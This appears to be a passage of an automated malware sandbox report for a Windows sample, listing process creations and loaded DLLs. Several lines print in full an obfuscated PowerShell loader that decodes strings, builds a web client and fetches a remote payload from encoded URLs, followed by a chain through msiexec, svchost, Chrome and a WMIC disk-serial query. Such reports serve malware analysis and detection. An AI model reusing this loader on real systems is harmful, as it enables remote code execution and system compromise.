I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (Marescha
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (Marescha
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chrBC15.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1aeadd7b/4a1b3c1a"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2488,i,17319326758939712999,7125565057770333449,262144 /prefetch:8
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (MareschaJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chrBC15.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1aeadd7b/4a1b3c1a"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"Jump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2488,i,17319326758939712999,7125565057770333449,262144 /prefetch:8Jump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
